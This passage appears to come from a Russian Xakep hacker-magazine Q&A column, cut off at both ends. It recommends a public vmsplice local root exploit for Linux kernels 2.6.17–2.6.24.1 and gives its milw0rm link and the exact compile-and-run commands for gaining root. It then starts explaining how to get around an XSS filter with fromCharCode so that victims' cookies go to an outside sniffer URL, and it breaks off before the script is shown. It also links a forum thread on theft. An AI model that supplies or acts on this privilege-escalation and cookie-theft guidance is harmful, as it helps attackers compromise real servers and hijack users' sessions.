Офисное западло - Xakep Online

units
месте тут же появится другой. Немного информации по теме кражи доров
ты сможешь найти тут: http://forum.glavmed.com/showthread.phpt=1342
Q: Какой local root exploit под не самые старые ядра linux можешь
посоветовать, как самый эффективный
A: По долгу службы я чаще всего сталкиваюсь с ядрами 2.6.2x ветки. Под
них существует несколько паблик сплойтов, но моим любимым является
Linux Kernel 2.6.17 — 2.6.24.1 vmsplice Local Root Exploit (http://
milw0rm.com/exploits/5092). С ним я получаю рут в два шага:
1) компилю gcc -static -Wno-format -O2 vmsplice.c -o vmsplice;
2) запускаю (./vmsplice), жду 2 секунды и наслаждаюсь правами рута :).
Q: Нашел XSS на серьезном сервисе, но все нехорошие символы,
кроме < и >, жестко фильтруются, как быть
A: Тоже недавно столкнулся с этим вопросом и придумал элегантное
решение с объединением массивов и функции fromCharCode() в
javascript. Смотри. У нас имеется адрес сниффера, который отлавливает
приходящие на него кукисы, например http://snif.com/sniffer.phpid=[тут
передаются куки]. Засовываем этот адрес в нехитрый php-скрипт: